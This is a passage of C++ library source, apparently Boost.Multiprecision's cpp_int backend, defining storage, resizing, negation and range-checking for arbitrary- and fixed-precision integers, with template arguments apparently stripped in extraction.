1 : 0);\r\n // We never resize beyond MaxSize:\r\n if(new_size > max_limbs)\r\n new_size = max_limbs;\r\n detail::verify_new_size(new_size, min_size, checked_type());\r\n // See if we have enough capacity already:\r\n unsigned cap = capacity();\r\n if(new_size > cap)\r\n {\r\n // Allocate a new buffer and copy everything over:\r\n cap = (std::min)((std::max)(cap * 4, new_size), max_limbs);\r\n limb_pointer pl = allocator().allocate(cap);\r\n std::memcpy(pl, limbs(), size() * sizeof(limbs()[0]));\r\n if(!m_internal)\r\n allocator().deallocate(limbs(), capacity());\r\n else\r\n m_internal = false;\r\n m_limbs = new_size;\r\n m_data.ld.capacity = cap;\r\n m_data.ld.data = pl;\r\n }\r\n else\r\n {\r\n m_limbs = new_size;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_NOEXCEPT\r\n {\r\n limb_pointer p = limbs();\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(), m_limbs(1), m_sign(false), m_internal(true) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(const cpp_int_base& o) : allocator_type(o), m_limbs(0), m_internal(true)\r\n {\r\n resize(o.size(), o.size());\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n cpp_int_base(cpp_int_base&& o)\r\n : allocator_type(static_cast(o)), m_limbs(o.m_limbs), m_sign(o.m_sign), m_internal(o.m_internal)\r\n {\r\n if(m_internal)\r\n {\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n else\r\n {\r\n m_data.ld = o.m_data.ld;\r\n o.m_limbs = 0;\r\n o.m_internal = true;\r\n }\r\n }\r\n cpp_int_base& operator = (cpp_int_base&& o) BOOST_NOEXCEPT\r\n {\r\n if(!m_internal)\r\n allocator().deallocate(m_data.ld.data, m_data.ld.capacity);\r\n *static_cast(this) = static_cast(o);\r\n m_limbs = o.m_limbs;\r\n m_sign = o.m_sign;\r\n m_internal = o.m_internal;\r\n if(m_internal)\r\n {\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n else\r\n {\r\n m_data.ld = o.m_data.ld;\r\n o.m_limbs = 0;\r\n o.m_internal = true;\r\n }\r\n return *this;\r\n }\r\n#endif\r\n BOOST_MP_FORCEINLINE ~cpp_int_base() BOOST_NOEXCEPT\r\n {\r\n if(!m_internal)\r\n allocator().deallocate(limbs(), capacity());\r\n }\r\n void assign(const cpp_int_base& o)\r\n {\r\n if(this != &o)\r\n {\r\n static_cast(*this) = static_cast(o);\r\n m_limbs = 0;\r\n resize(o.size(), o.size());\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_data, o.m_data);\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_internal, o.m_internal);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n\r\ntemplate \r\nstruct 
cpp_int_base : private Allocator::template rebind::other\r\n{\r\n //\r\n // There is currently no support for unsigned arbitrary precision arithmetic, largely\r\n // because it's not clear what subtraction should do:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(((sizeof(Allocator) == 0) && !is_void::value), \"There is curently no support for unsigned arbitrary precision integers.\");\r\n};\r\n//\r\n// Fixed precision (i.e. no allocator), signed-magnitude type with limb-usage count:\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef limb_type* limb_pointer;\r\n typedef const limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits > sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count = MinBits / limb_bits + ((MinBits % limb_bits) ? 1 : 0));\r\n BOOST_STATIC_CONSTANT(bool, variable = false);\r\n BOOST_STATIC_CONSTANT(limb_type, upper_limb_mask = (MinBits % limb_bits) ? (limb_type(1) << (MinBits % limb_bits)) -1 : (~limb_type(0)));\r\n BOOST_STATIC_ASSERT_MSG(internal_limb_count >= 2, \"A fixed precision integer type must have at least 2 limbs\");\r\n\r\nprivate:\r\n union data_type{\r\n limb_type m_data[internal_limb_count];\r\n limb_type m_first_limb;\r\n double_limb_type m_double_first_limb;\r\n\r\n BOOST_CONSTEXPR data_type() : m_first_limb(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : m_first_limb(i) {}\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : m_double_first_limb(i) {}\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR data_type(literals::detail::value_pack) : m_data{ VALUES... } {}\r\n#endif\r\n } m_wrapper;\r\n boost::uint16_t m_limbs;\r\n bool m_sign;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(1), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(limb_type(i < 0 ? static_cast(-static_cast(i)) : i)), m_limbs(1), m_sign(i < 0) {}\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(i > max_limb_value ? 2 : 1), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(double_limb_type(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i)),\r\n m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > max_limb_value ? 2 : 1) : (i > max_limb_value ? 
2 : 1)),\r\n m_sign(i < 0) {}\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack i)\r\n : m_wrapper(i), m_limbs(sizeof...(VALUES)), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<> i)\r\n : m_wrapper(i), m_limbs(1), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& a, const literals::detail::negate_tag&)\r\n : m_wrapper(a.m_wrapper), m_limbs(a.m_limbs), m_sign((a.m_limbs == 1) && (*a.limbs() == 0) ? false : !a.m_sign) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n m_limbs = static_cast((std::min)(new_size, internal_limb_count));\r\n detail::verify_new_size(m_limbs, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n limb_pointer p = limbs();\r\n detail::verify_limb_mask(m_limbs == internal_limb_count, p[internal_limb_count-1], upper_limb_mask, checked_type());\r\n p[internal_limb_count-1] &= upper_limb_mask;\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n if((m_limbs == 1) && (!*p)) m_sign = false; // zero is always unsigned\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base()BOOST_NOEXCEPT : m_wrapper(limb_type(0u)), m_limbs(1), m_sign(false) {}\r\n // Not defaulted, it breaks constexpr support in the Intel compiler for some reason:\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o)BOOST_NOEXCEPT\r\n : m_wrapper(o.m_wrapper), m_limbs(o.m_limbs), m_sign(o.m_sign) {}\r\n // Defaulted functions:\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n\r\n void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n if(this != &o)\r\n {\r\n m_limbs = o.m_limbs;\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(o.limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n for(unsigned i = 0; i < (std::max)(size(), o.size()); ++i)\r\n std::swap(m_wrapper.m_data[i], o.m_wrapper.m_data[i]);\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned 
cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n//\r\n// Fixed precision (i.e. no allocator), unsigned type with limb-usage count:\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef limb_type* limb_pointer;\r\n typedef const limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits > sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count = MinBits / limb_bits + ((MinBits % limb_bits) ? 1 : 0));\r\n BOOST_STATIC_CONSTANT(bool, variable = false);\r\n BOOST_STATIC_CONSTANT(limb_type, upper_limb_mask = (MinBits % limb_bits) ? (limb_type(1) << (MinBits % limb_bits)) -1 : (~limb_type(0)));\r\n BOOST_STATIC_ASSERT_MSG(internal_limb_count >= 2, \"A fixed precision integer type must have at least 2 limbs\");\r\n\r\nprivate:\r\n union data_type{\r\n limb_type m_data[internal_limb_count];\r\n limb_type m_first_limb;\r\n double_limb_type m_double_first_limb;\r\n\r\n BOOST_CONSTEXPR data_type() : m_first_limb(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : m_first_limb(i) {}\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : m_double_first_limb(i) {}\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR data_type(literals::detail::value_pack) : m_data{ VALUES... } {}\r\n#endif\r\n } m_wrapper;\r\n limb_type m_limbs;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(1) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(signed_limb_type i)BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_wrapper(limb_type(i < 0 ? static_cast(-static_cast(i)) : i)), m_limbs(1) { if(i < 0) negate(); }\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(i > max_limb_value ? 2 : 1) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(signed_double_limb_type i)BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_wrapper(double_limb_type(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i)), \r\n m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > max_limb_value ? 2 : 1) : (i > max_limb_value ? 
2 : 1)) \r\n {\r\n if (i < 0) negate();\r\n }\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack i)\r\n : m_wrapper(i), m_limbs(sizeof...(VALUES)) {}\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>)\r\n : m_wrapper(static_cast(0u)), m_limbs(1) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return false; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_MP_NOEXCEPT_IF((Checked == unchecked)) { if(b) negate(); }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n m_limbs = (std::min)(new_size, internal_limb_count);\r\n detail::verify_new_size(m_limbs, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n limb_pointer p = limbs();\r\n detail::verify_limb_mask(m_limbs == internal_limb_count, p[internal_limb_count-1], upper_limb_mask, checked_type());\r\n p[internal_limb_count-1] &= upper_limb_mask;\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT\r\n : m_wrapper(limb_type(0u)), m_limbs(1) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_wrapper(o.m_wrapper), m_limbs(o.m_limbs) {}\r\n // Defaulted functions:\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n if(this != &o)\r\n {\r\n m_limbs = o.m_limbs;\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n }\r\nprivate:\r\n void check_negate(const mpl::int_&)\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Attempt to negate an unsigned number.\"));\r\n }\r\n void check_negate(const mpl::int_&){}\r\npublic:\r\n void negate() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n // Not so much a negate as a complement - this gets called when subtraction\r\n // would result in a \"negative\" number:\r\n unsigned i;\r\n if((m_limbs == 1) && (m_wrapper.m_data[0] == 0))\r\n return; // negating zero is always zero, and always OK.\r\n check_negate(checked_type());\r\n for(i = m_limbs; i < internal_limb_count; ++i)\r\n m_wrapper.m_data[i] = 0;\r\n m_limbs = internal_limb_count;\r\n for(i = 0; i < internal_limb_count; ++i)\r\n m_wrapper.m_data[i] = ~m_wrapper.m_data[i];\r\n normalize();\r\n eval_increment(static_cast& >(*this));\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return false;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n for(unsigned i = 0; i < (std::max)(size(), o.size()); ++i)\r\n std::swap(m_wrapper.m_data[i], o.m_wrapper.m_data[i]);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst 
limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n//\r\n// Traits classes to figure out a native type with N bits, these vary from boost::uint_t only\r\n// because some platforms have native integer types longer than boost::long_long_type, \"really boost::long_long_type\" anyone??\r\n//\r\ntemplate \r\nstruct trivial_limb_type_imp\r\n{\r\n typedef double_limb_type type;\r\n};\r\n\r\ntemplate \r\nstruct trivial_limb_type_imp\r\n{\r\n typedef typename boost::uint_t::least type;\r\n};\r\n\r\ntemplate \r\nstruct trivial_limb_type : public trivial_limb_type_imp {};\r\n//\r\n// Backend for fixed precision signed-magnitude type which will fit entirely inside a \"double_limb_type\":\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef typename trivial_limb_type::type local_limb_type;\r\n typedef local_limb_type* limb_pointer;\r\n typedef const local_limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\nprotected:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(local_limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(local_limb_type, limb_mask = (MinBits < limb_bits) ? local_limb_type((local_limb_type(~local_limb_type(0))) >> (limb_bits - MinBits)) : local_limb_type(~local_limb_type(0)));\r\nprivate:\r\n local_limb_type m_data;\r\n bool m_sign;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits <= sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\nprotected:\r\n template \r\n typename boost::disable_if_c::value || (std::numeric_limits::is_specialized && (std::numeric_limits::digits <= (int)MinBits))>::type\r\n check_in_range(T val, const mpl::int_&)\r\n {\r\n typedef typename common_type::type, local_limb_type>::type common_type;\r\n\r\n if(static_cast(boost::multiprecision::detail::unsigned_abs(val)) > static_cast(limb_mask))\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n typename boost::disable_if_c::value || (std::numeric_limits::is_specialized && (std::numeric_limits::digits <= (int)MinBits))>::type\r\n check_in_range(T val, const mpl::int_&)\r\n {\r\n using std::abs;\r\n typedef typename common_type::type common_type;\r\n\r\n if (static_cast(abs(val)) > static_cast(limb_mask))\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n void check_in_range(T, const mpl::int_&) BOOST_NOEXCEPT {}\r\n\r\n template \r\n void check_in_range(T val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval(), checked_type())))\r\n {\r\n check_in_range(val, checked_type());\r\n }\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? 
static_cast(static_cast::type>(boost::multiprecision::detail::unsigned_abs(i)) & limb_mask) : static_cast(i & limb_mask)), m_sign(i < 0) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? (static_cast(static_cast::type>(boost::multiprecision::detail::unsigned_abs(i)) & limb_mask)) : static_cast(i & limb_mask)), m_sign(i < 0)\r\n { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked)>::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i) & limb_mask), m_sign(false) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked)>::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i) & limb_mask), m_sign(false) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(F i, typename boost::enable_if_c::value && (Checked == unchecked)>::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(std::fabs(i)) & limb_mask), m_sign(i < 0) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(F i, typename boost::enable_if_c::value && (Checked == checked)>::type const* = 0)\r\n : m_data(static_cast(std::fabs(i)) & limb_mask), m_sign(i < 0) { check_in_range(i); }\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>) BOOST_NOEXCEPT\r\n : m_data(static_cast(0u)), m_sign(false) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack)BOOST_NOEXCEPT\r\n : m_data(static_cast(a)), m_sign(false) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack)BOOST_NOEXCEPT\r\n : m_data(static_cast(a) | (static_cast(b) << bits_per_limb)), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& a, const literals::detail::negate_tag&)BOOST_NOEXCEPT\r\n : m_data(a.m_data), m_sign(a.m_data ? 
!a.m_sign : false) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR unsigned size()const BOOST_NOEXCEPT { return 1; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && !m_data)\r\n {\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size)\r\n {\r\n detail::verify_new_size(2, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(!m_data)\r\n m_sign = false; // zero is always unsigned\r\n detail::verify_limb_mask(true, m_data, limb_mask, checked_type());\r\n m_data &= limb_mask;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(0), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_data(o.m_data), m_sign(o.m_sign) {}\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n m_data = o.m_data;\r\n m_sign = o.m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_data == 0)\r\n {\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_data, o.m_data);\r\n }\r\n};\r\n//\r\n// Backend for unsigned fixed precision (i.e. no allocator) type which will fit entirely inside a \"double_limb_type\":\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef typename trivial_limb_type::type local_limb_type;\r\n typedef local_limb_type* limb_pointer;\r\n typedef const local_limb_type* const_limb_pointer;\r\nprivate:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(local_limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(local_limb_type, limb_mask = limb_bits != MinBits ? 
\r\n static_cast(static_cast(~local_limb_type(0)) >> (limb_bits - MinBits))\r\n : static_cast(~local_limb_type(0)));\r\n\r\n local_limb_type m_data;\r\n\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits <= sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\nprotected:\r\n template \r\n typename boost::disable_if_c::is_specialized && (std::numeric_limits::digits <= (int)MinBits)>::type\r\n check_in_range(T val, const mpl::int_&, const boost::false_type&)\r\n {\r\n typedef typename common_type::type common_type;\r\n\r\n if(static_cast(val) > limb_mask)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n void check_in_range(T val, const mpl::int_&, const boost::true_type&)\r\n {\r\n typedef typename common_type::type common_type;\r\n\r\n if(static_cast(val) > limb_mask)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n if(val < 0)\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to an unsigned cpp_int constructor was negative.\"));\r\n }\r\n template \r\n BOOST_MP_FORCEINLINE void check_in_range(T, const mpl::int_&, const boost::integral_constant&) BOOST_NOEXCEPT {}\r\n\r\n template \r\n BOOST_MP_FORCEINLINE void check_in_range(T val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval(), checked_type(), is_signed())))\r\n {\r\n check_in_range(val, checked_type(), is_signed());\r\n }\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n#ifdef __MSVC_RUNTIME_CHECKS\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(i < 0 ? (1 + ~static_cast(-i & limb_mask)) & limb_mask : static_cast(i & limb_mask)) 